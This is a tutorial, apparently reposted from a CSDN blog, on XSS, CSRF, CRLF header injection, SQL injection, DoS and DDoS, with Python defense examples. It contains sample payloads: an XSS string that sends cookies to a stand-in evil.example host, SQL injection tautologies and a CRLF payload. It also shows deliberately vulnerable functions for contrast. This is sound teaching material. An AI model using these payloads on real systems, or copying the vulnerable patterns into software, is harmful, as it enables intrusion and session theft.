Common web attack methods and corresponding defenses

XSS (Cross Site Scripting Attack)

Introduction:

Cross-site scripting (XSS) refers to exploiting vulnerabilities left during web development to inject malicious code into a web page, so that other users' browsers load and execute content created by the attacker. The injected payload is usually JavaScript, but it can also be Java, VBScript, ActiveX, Flash or even plain HTML. After a successful attack the attacker may obtain, among other things, the ability to act with the victim's privileges (performing operations as that user), private page content, the session, and cookies.

Classification:

  • Stored (persistent): the attacker submits data that is stored, for example in the database; every user who later views a page that embeds it is attacked.
  • Reflected: the attack code is placed in a request parameter of the URL, and the server echoes it back into the response page; the victim has to be lured into opening the crafted link.
  • DOM-based (often listed separately): client-side script itself writes untrusted data, such as a URL fragment, into the DOM; the server never sees the payload.

Defense method:

  • HttpOnly: a cookie set with this attribute cannot be read by page JavaScript (document.cookie), so an XSS payload cannot exfiltrate it. This limits the damage of an attack rather than preventing it: the injected script still runs and can act on the user's behalf.
  • Input and output handling: validate input where possible, but the decisive defense is encoding untrusted data on output according to the context it is written into (HTML body, attribute, JavaScript, URL), because the same string is dangerous in one context and harmless in another.
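The two defenses above, as an added example (not code from the original page): a constructed stored comment carrying a payload, rendered once by naive concatenation and once with context-specific escaping, plus the Set-Cookie header with HttpOnly. The cookie name sid and the comment payload are assumptions for the demonstration.

```python
import html
import re

# Constructed sample: a stored comment carrying an XSS payload, as an attacker might
# have submitted it through a comment form (assumption, not data from the original page).
STORED_COMMENT = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'


def render_comment_vulnerable(comment: str) -> str:
    """Untrusted data dropped straight into the HTML body: the payload becomes live markup."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """HTML body context: <, >, &, double and single quotes become entities,
    so the browser displays the text instead of parsing it."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


def render_attr_safe(value: str) -> str:
    """Attribute context: escape the value *and* always quote the attribute."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


_SAFE_URL = re.compile(r"^(https?://|/(?!/))", re.IGNORECASE)


def render_link_safe(next_url: str) -> str:
    """URL context: escaping alone does not stop javascript: or //evil links,
    so allow only absolute http(s) URLs and site-local paths, then escape."""
    if not _SAFE_URL.match(next_url):
        next_url = "/"
    return f'<a href="{html.escape(next_url, quote=True)}">continue</a>'


def session_cookie_header(session_id: str) -> str:
    """HttpOnly stops document.cookie from reading the session cookie; Secure and
    SameSite are the usual companions (assumed cookie name: sid)."""
    return f"Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


_EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=")


def has_live_event_handler(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderings:
    does an element with an on* attribute survive in the output?"""
    return _EVENT_HANDLER.search(rendered) is not None


if __name__ == "__main__":
    print(render_comment_vulnerable(STORED_COMMENT))
    print(render_comment_safe(STORED_COMMENT))
    print(session_cookie_header("9f1c2e"))
```

The escaping functions are per context on purpose: html.escape is correct for the body and for quoted attributes, but a value destined for a URL or a script block needs its own rules, which is why the link renderer validates the scheme before escaping.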

CSRF (Cross Site Request Forgery)

Introduction:
CSRF (Cross-Site Request Forgery), also called "one-click attack" or session riding and abbreviated CSRF or XSRF, is a malicious use of a website's trust in the user's browser. Put simply, the attacker borrows your identity and sends a request in your name: because the browser attaches your cookies automatically, the request looks completely legitimate to the server, yet it performs an operation the attacker chose, such as sending email or messages in your name, taking over your account, adding a system administrator, purchasing goods or transferring virtual currency.

Defense method:

  • Verify the HTTP Referer (or Origin) header: this field records the page the request came from. Browser script cannot forge it, but some clients and proxies strip it, so fail closed (reject) when it is absent on a state-changing request.
  • Add a token to the request and verify it: an unguessable value tied to the session and sent in the form or URL; a cross-site page cannot read it and therefore cannot include it.
  • Use a custom HTTP header and verify it: a header such as X-Requested-With can only be added by same-origin script, so its presence shows the request came from your own pages.
  • Use a verification code (CAPTCHA) for sensitive operations.
  • Set the SameSite attribute on session cookies so the browser does not attach them to cross-site requests; this complements the token check rather than replacing it.
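The Referer/Origin check and the session-bound token from the list above, as an added example (not code from the original page). The transfer handler, the cookie name sid, the host bank.example and the two request dictionaries are constructed for the demonstration; a real application would take them from its web framework.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

# Assumption: a server-side secret loaded from configuration; generated here so the
# example runs stand-alone.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: nonce plus HMAC(secret, session_id || nonce),
    so a token captured in one session is useless in another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)  # constant-time comparison


def origin_allowed(headers: dict, allowed_host: str) -> bool:
    """Defense 1: the request must come from our own origin. Origin is preferred;
    Referer is the fallback; a missing header fails closed."""
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False
    return urlparse(source).hostname == allowed_host


def handle_transfer(request: dict, allowed_host: str = "bank.example") -> str:
    """State-changing endpoint: session cookie, origin check, then token check."""
    session_id = request["cookies"].get("sid")
    if session_id is None:
        return "401 not logged in"
    if not origin_allowed(request["headers"], allowed_host):
        return "403 bad origin"
    if not verify_csrf_token(session_id, request["form"].get("csrf_token", "")):
        return "403 bad csrf token"
    return f"200 transferred {request['form']['amount']} to {request['form']['to']}"


def demo():
    """Constructed requests: one from the bank's own form, one from an attacker's page.
    The forged request carries the victim's cookie (the browser adds it automatically)
    but neither the right Origin nor the token."""
    sid = "session-42"
    token = issue_csrf_token(sid)
    legit = {"cookies": {"sid": sid}, "headers": {"Origin": "https://bank.example"},
             "form": {"to": "alice", "amount": "10", "csrf_token": token}}
    forged = {"cookies": {"sid": sid}, "headers": {"Origin": "https://evil.example"},
              "form": {"to": "mallory", "amount": "9999"}}
    return handle_transfer(legit), handle_transfer(forged)


if __name__ == "__main__":
    print(demo())
```

Both checks are independent: a page that strips Referer/Origin still fails on the token, and a leaked token from a different session still fails the HMAC, because the session id is part of the signed message.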

HTTP header injection attack (CRLF injection)

Introduction:
Everyone who views a website in a browser, whatever technology or framework the site uses, does so over HTTP.
In HTTP, the response headers are separated from the body by an empty line, i.e. two consecutive CRLF sequences (0x0D 0x0A). This empty line marks the end of the headers and the start of the body. An attacker can take advantage of this: if there is any way to inject CR/LF characters into a header value (for example a redirect target or a cookie value copied from the request), the attacker can append headers of their own, such as Set-Cookie, or terminate the headers early and supply a body of their choosing, which turns header injection into HTTP response splitting and from there into XSS or cache poisoning.

Defense method:
Never write CR (0x0D), LF (0x0A) or NUL into a header value: reject (or at least strip) them from every value that comes from the request before it is placed in a response header, and rely on a framework that does this for you rather than building headers by string concatenation.
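The injection and the check above, as an added example (not code from the original page): a redirect built by concatenation, the same redirect with a header-value filter, and a small response parser that shows what a client would see. The payload string is constructed for the demonstration.

```python
import re

# Characters that must never appear inside a header value.
_CTL = re.compile(r"[\r\n\x00]")

# Constructed payload (assumption): a redirect target that carries a second header and
# a body of its own.
PAYLOAD = "/home\r\nSet-Cookie: sid=attacker\r\n\r\n<script>alert(1)</script>"


class HeaderInjection(ValueError):
    pass


def build_redirect_vulnerable(target: str) -> bytes:
    """The request-controlled value is concatenated straight into the header block."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n\r\n".encode("latin-1")


def header_value(value: str) -> str:
    """Reject rather than strip: a stripped value may silently become a different URL."""
    if _CTL.search(value):
        raise HeaderInjection("CR, LF or NUL not allowed in a header value")
    return value


def build_redirect_safe(target: str) -> bytes:
    return f"HTTP/1.1 302 Found\r\nLocation: {header_value(target)}\r\n\r\n".encode("latin-1")


def parse_response(raw: bytes):
    """Minimal parser: first empty line ends the headers, everything after it is body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, val = line.partition(b":")
        headers.setdefault(name.strip().decode("latin-1"), val.strip().decode("latin-1"))
    return lines[0].decode("latin-1"), headers, body


if __name__ == "__main__":
    print(parse_response(build_redirect_vulnerable(PAYLOAD)))
    try:
        build_redirect_safe(PAYLOAD)
    except HeaderInjection as e:
        print("rejected:", e)
```

With the vulnerable builder the parser reports an extra Set-Cookie header and a body beginning with the injected script, even though the server only meant to send a Location header; the safe builder raises before any byte reaches the wire. The filter also catches a bare LF, which many real clients accept as a line terminator.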

SQL injection

Introduction:
SQL injection occurs when a web application does not validate user input (or filters it loosely) and builds its SQL by concatenating that input into a predefined query. The attacker can then append SQL of their own to the query and, without the administrator noticing, make the database server execute unauthorized statements, retrieving or modifying data it was never meant to expose.

Defense method:

  • Basic and secondary filtering: check user input before it is used. Converting or escaping characters such as single quotes, double quotes and semicolons reduces exposure, but escaping is easy to get wrong (character-set tricks, numeric fields that take no quotes at all), so treat it as defense in depth rather than the primary control.
  • Hierarchical management: manage users in tiers and control their permissions strictly. The account the application uses to connect should be granted only the statements it needs; ordinary users must not be able to create, drop or alter database objects, and full add, delete, modify and query rights are reserved for the system administrator.
  • Parameter passing: the primary defense. Never write variables directly into the SQL string; pass them as bound parameters of a prepared statement so the database treats them as data and never as SQL code. Input validation is still worthwhile on top of this.
  • Encrypt sensitive database content (and store passwords only as salted hashes), so that a successful injection yields less.
  • Multi-layer verification.
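The "parameter passing" point above, as an added example (not code from the original page): the same login query written by string concatenation and with bound parameters, run against a constructed in-memory SQLite table. The table, the two accounts and the payloads are assumptions for the demonstration; the plaintext password column is kept only to keep the injection visible, a real table stores a salted hash.

```python
import sqlite3

# Constructed payloads (assumptions): the classic tautology and a comment that
# truncates the rest of the WHERE clause.
TAUTOLOGY = "' OR '1'='1"
COMMENT_OUT = "admin'--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("alice", "hunter2", "user")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Input is pasted into the statement, so quotes and comments in it are SQL."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str):
    """Bound parameters: the driver sends the values separately from the statement,
    so a quote inside them is just a character to compare against."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", login_vulnerable(db, "admin", TAUTOLOGY))
    print("vulnerable, comment:  ", login_vulnerable(db, COMMENT_OUT, "anything"))
    print("safe, tautology:      ", login_safe(db, "admin", TAUTOLOGY))
    print("safe, comment:        ", login_safe(db, COMMENT_OUT, "anything"))
```

The concatenated version returns every row for the tautology (AND binds tighter than OR, so the clause becomes (username = 'admin' AND password = '') OR '1'='1') and logs in as admin for the comment payload; the parameterized version returns nothing for both, because it is looking for a user literally named admin'-- or a password literally equal to ' OR '1'='1.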

DoS attack (denial of service attack)

Introduction:

DoS is short for Denial of Service. Attacks that cause a denial of service are called DoS attacks; their purpose is to make a computer or network unable to provide its normal service.

Common DoS attack methods and prevention:

  • SYN Flood attack: the attacker sends a stream of TCP SYN packets, usually with spoofed source addresses, and never completes the handshake, so the server's half-open connection queue fills up and legitimate connections are refused.
    The first countermeasure is to shorten the SYN timeout so half-open entries are discarded sooner.
    The second is SYN cookies: instead of allocating a queue entry when a SYN arrives, the server encodes the connection parameters (addresses, ports, a coarse timestamp and the client's MSS) into the initial sequence number of its SYN-ACK, keyed with a secret. Connection state is created only when the client's final ACK carries a sequence number that verifies against that encoding, so spoofed SYNs cost the server nothing to store.

  • Smurf attack: the attacker sends ICMP echo requests to a network's broadcast address with the victim's address as the spoofed source, so every host on the segment replies to the victim. Configure the following on Cisco routers so packets are not delivered to the broadcast address: Router(config-if)# no ip directed-broadcast

  • Ping of Death: an ICMP packet whose fragments reassemble to more than the maximum IP datagram size of 65535 bytes, which crashed unpatched IP stacks; defended by keeping the stack patched and dropping fragments that would exceed the limit.

  • Teardrop attack: IP fragments with overlapping offsets that older reassembly code mishandled; likewise defended by patching and by firewalls that validate fragment offsets before forwarding.
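The SYN cookie mechanism described under SYN Flood, as an added example (not code from the original page or any kernel): the server computes a 32-bit initial sequence number from the connection tuple, a coarse counter and the client's MSS, and later recognizes a valid third-step ACK from that number alone, holding no state in between. The bit layout (5-bit counter, 2-bit MSS index, 25-bit MAC), the MSS table, the 64-second counter period and the use of HMAC-SHA256 are this example's own choices, loosely modeled on the classic scheme; the addresses and ports in the demo are constructed.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: a per-host secret regenerated at boot; generated here so the example runs alone.
SERVER_SECRET = secrets.token_bytes(32)
MSS_TABLE = [536, 1220, 1440, 1460]  # 2 bits pick the largest table entry <= client MSS
COUNTER_PERIOD = 64                   # seconds per counter tick; cookies stay valid ~2 ticks


def _counter(now: float) -> int:
    return int(now // COUNTER_PERIOD) & 0x1F  # 5-bit coarse timestamp


def _mac(saddr, sport, daddr, dport, counter) -> int:
    msg = f"{saddr}:{sport}>{daddr}:{dport}|{counter}".encode()
    digest = hmac.new(SERVER_SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big") & 0x01FFFFFF  # 25-bit truncated MAC


def make_syn_cookie(saddr, sport, daddr, dport, client_mss, now=None) -> int:
    """ISN for the SYN-ACK. Nothing is stored; everything needed later is in the number."""
    now = time.time() if now is None else now
    counter = _counter(now)
    mss_idx = max([i for i, mss in enumerate(MSS_TABLE) if mss <= client_mss], default=0)
    # layout: 5-bit counter | 2-bit MSS index | 25-bit MAC
    return (counter << 27) | (mss_idx << 25) | _mac(saddr, sport, daddr, dport, counter)


def check_syn_cookie(saddr, sport, daddr, dport, ack_seq, now=None):
    """Validate the ACK of the third handshake step. Returns the MSS to use for the
    new connection, or None if the ACK is forged or too old."""
    now = time.time() if now is None else now
    cookie = (ack_seq - 1) & 0xFFFFFFFF  # the client acknowledges ISN + 1
    counter = cookie >> 27
    mss_idx = (cookie >> 25) & 0x3
    mac = cookie & 0x01FFFFFF
    age = (_counter(now) - counter) & 0x1F
    if age > 1:
        return None  # expired, or a counter the attacker guessed
    expected = _mac(saddr, sport, daddr, dport, counter)
    if not hmac.compare_digest(mac.to_bytes(4, "big"), expected.to_bytes(4, "big")):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    # Constructed handshake: client 203.0.113.5:40000 -> server 198.51.100.1:80
    t0 = 1_700_000_000.0
    isn = make_syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, 1460, now=t0)
    print("SYN-ACK seq:", isn)
    print("valid ACK ->", check_syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, isn + 1, now=t0 + 5))
    print("spoofed ACK ->", check_syn_cookie("203.0.113.5", 40000, "198.51.100.1", 80, (isn ^ 1) + 1, now=t0 + 5))
```

The practical caveat is visible in the layout: only the MSS survives the round trip, so options negotiated in the SYN (window scaling, SACK) are lost on connections accepted via cookies, which is why kernels enable cookies only once the SYN queue overflows.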

DDoS attack (distributed denial of service attack)

Introduction:

Distributed Denial of Service (DDoS), in short, floods a server with requests from many sources until it can no longer respond. DDoS builds on DoS; in everyday terms, DoS is one attacker against one target, and DDoS is a crowd attacking it together.

Defense method:

  • Increase bandwidth, so that volumetric traffic is less likely to saturate the link
  • Optimize routing and network structure (anycast, upstream scrubbing, separating critical services)
  • Deploy a firewall and rate limiting in front of the servers
  • Train network operations staff so that an attack is recognized and handled quickly


Origin blog.csdn.net/PILIpilipala/article/details/114434097